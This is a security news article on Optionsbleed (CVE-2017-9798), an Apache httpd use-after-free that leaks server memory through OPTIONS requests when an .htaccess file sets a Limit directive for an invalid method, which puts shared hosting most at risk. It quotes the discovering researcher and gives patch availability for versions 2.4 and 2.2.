Apache Web Server Bug Can Allow Attackers to Dip into Memory Data

A vulnerability found in the Apache web server can allow attackers to obtain sensitive data stored in the server’s memory. The flaw can be triggered through .htaccess configuration files so it poses the greatest risk to shared hosting environments that allow users to create such files.
“If you run an Apache web server in a shared hosting environment that allows users to create .htaccess files you should drop everything you are doing right now, update immediately and make sure you restart the server afterward,” said security researcher Hanno Böck, who discovered the vulnerability. He dubbed it Optionsbleed because it is similar in concept to Heartbleed, a vulnerability found in OpenSSL three years ago that allowed attackers to extract memory contents from HTTPS-enabled web servers.
While similar to Heartbleed, Optionsbleed is much more limited in scope because it requires special conditions to be exploited. The bug is triggered when a server receives an HTTP OPTIONS request and has a Limit directive in its configuration file for a non-standard HTTP method.
Most people are familiar with HTTP GET and POST, but these are just two of the request “methods” defined in the HTTP protocol. One other method is called OPTIONS and servers that receive such requests respond with a header that lists the HTTP methods they support.
Administrators can restrict access to certain HTTP methods by using a configuration directive called Limit.
“Setting a Limit directive for any invalid HTTP method in an .htaccess file caused a use after free error in the construction of the Allow header,” Böck said in his report.
If a vulnerable server is identified, attackers can repeatedly send OPTIONS requests to it in order to obtain data from the memory of the web server process. These memory chunks can include sensitive information that is being processed by the server at that time.
At first glance, the administrator of a web server would have no reason to set a Limit directive for a non-standard HTTP method, so the risk shouldn’t be that great. However, in shared hosting environments, where multiple users share the same web server and can create their own .htaccess files, the error can be triggered intentionally.
“The corruption is not limited to a single virtual host,” Böck said. “One customer of a shared hosting provider could deliberately create an .htaccess file causing this corruption hoping to be able to extract secret data from other hosts on the same system.”
A scan performed by Böck across the Alexa Top Million websites revealed 466 hosts with corrupted Allow headers.
The vulnerability is tracked as CVE-2017-9798 and will be fixed in Apache httpd version 2.4.28, which hasn’t been released yet, but a manual patch is available. Multiple Linux distribution have already released patched packages, so you should check with your distribution maintainers.
It’s worth noting that the vulnerability also affects Apache 2.2, which has reached end-of-life and won’t receive an official fix. However, developer Thomas Deutschmann backported the patch for it.
Feature image via Pixabay.